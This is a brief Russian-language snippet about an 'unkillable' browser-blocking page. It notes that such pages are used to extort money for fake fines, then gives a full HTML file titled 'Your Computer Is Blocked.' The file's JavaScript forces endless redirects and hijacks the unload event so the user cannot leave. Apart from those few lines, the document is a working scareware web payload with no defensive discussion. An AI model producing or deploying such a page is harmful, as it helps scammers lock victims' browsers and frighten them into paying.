Неубиваемая блокирующая страница
Такой страницей выманивают денежку на уплату штрафов
Такая страница уже убивается
- infinite-redirect.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ваш Компьютер Заблокирован.</title> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> <script> onbeforeunload=function(){ window.location='?r='+Math.random(); var isFirefox = typeof InstallTrigger !== 'undefined'; var a = "Бесконечный редирект"; if(isFirefox) { //confirm(a); } return a; }; onload=function(){ window.location='?r='+Math.random(); } function reload() { console.log("preload"); setTimeout(function() { console.log("reload"); window.location='?r='+Math.random(); reload(); }, 1); } reload(); </script> </head> <body> <p>Бесконечный редирект</p> </body> </html>